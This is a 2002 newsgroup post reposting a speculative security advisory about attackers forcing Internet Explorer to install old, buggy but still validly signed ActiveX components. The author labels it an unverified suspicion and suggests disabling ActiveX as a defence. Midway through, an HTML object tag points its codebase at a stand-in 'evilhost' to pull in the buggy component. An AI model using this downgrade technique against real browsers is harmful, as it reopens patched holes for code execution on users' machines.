Digitally signing buggy ActiveX components

Georgi Guninski raises an interesting question:
http://www.guninski.com/signedactivex.html
Digitally signing buggy ActiveX components
Date: 14 February 2002
Disclaimer:
This is just an unverified suspicion. I don't claim this information is
true.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
Back in 1999 Juan Carlos Garcia Cuartango <cuartangojc@MX3.REDESTB.ES> made
an
excellent point at:
http://archives.neohapsis.com/archives/ntbugtraq/1998-1999/msg00422.html
-------------------
3- Even if Microsoft fixes the hole the hole could exist forever. Why ?
As far as I know  this is the first time a hole is "SIGNED".
MS has released an "dhtmed.cab" file as an ActiveX component signed by
Microsoft
-------------------
Here is more on this.
ActiveX in internet explorer allows downloading from the web and installing
signed components (native code) on the user computer.
As history shows a lot of ActiveX components are buggy and new version is
released. The interesting part is the buggy version is still really signed
and
available in one form or another.
A pure hypothethical scenario is to try to install the old buggy signed
version
if the user don't have it or on top of the patched one.
Basically this is done this way:
--------------------
<object codebase="http://evilhost/buggyreallysigned.file"
classid="clsid:speciallycrafted">
</object>
--------------------
So, I wonder whether doing such mischief may lead to old exploits start
working?
Workaround/Solution:
Don't know whether this is a real threat, this is just a suspicion.
Anyway, to prevent such stuff, in internet explorer security options
disable everything that contains "active".
Or at least if you see a prompt "...This is digitally signed by X..."
think do you really trust X having in mind his security record.
Regards,
Georgi Guninski
http://www.guninski.com
0
maggie
2/15/2002 6:23:00 AM
📁 grc.security
📃 16608 articles.
⭐ 3 followers.

💬 0 Replies
👁️‍🗨️ 308 Views


Reply: